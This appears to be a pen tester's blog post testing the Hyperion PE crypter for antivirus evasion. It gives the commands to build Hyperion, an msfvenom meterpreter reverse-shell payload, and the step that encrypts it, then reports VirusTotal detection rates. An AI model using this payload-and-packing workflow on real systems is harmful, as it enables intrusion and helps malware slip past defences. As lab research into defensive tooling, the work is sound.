antivirus evasion with hyperion

hyperion is a windows PE packer that encrypts the original executable

interestingly it doesn’t store the encryption key in the new executable, it brute forces it

i used it once with success against a dated AV installation, in a pen testing lab

i was interested to see how good it is at evading modern and up-to-date antivirus

# install hyperion (requires wine, mingw)
cd /opt
wget https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-1.2.zip
unzip hyperion.exe
rm Hyperion-1.2.zip
cd Hyperion-1.2
wine g++.exe Src/Crypter/*.cpp -o hyperion.exe

# generate a payload to encrypt
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=443 EXITFUNC=process -f exe > revshell.exe

# encrypt the payload with different default and non-default options
wine hyperion.exe -k -s revshell.exe hyperevshell.exe

# upload the result to virustotal
https://virustotal.com/

results
=======
default options: 40/56 detected as malicious
non-default options: 38/56 detected as malicious

even with the longest allowed key length of 16, all these antivirus engines picked it up

it seems like hyperion itself is not (sufficiently) polymorphic, so antivirus is picking up on static signature or heuristics

the other explanation would be that even with the largest key to brute force, it is still unpacking the payload ‘too fast’ and if/when it’s run in an AV sandbox for a short while then the real payload is being seen. but i can rule this out, because with a key length of 16 it’s taking a long time to brute the right combination

so, hyperion doesn’t seem to be a good candidate for general purpose use against targets using up-to-date AV

notes
=====
hyperion has the rather odd requirement of having to be run from the Hyperion-1.2 directory, because its binary references relative paths into the unpacked zipfile

Leave a Reply

Your email address will not be published. Required fields are marked *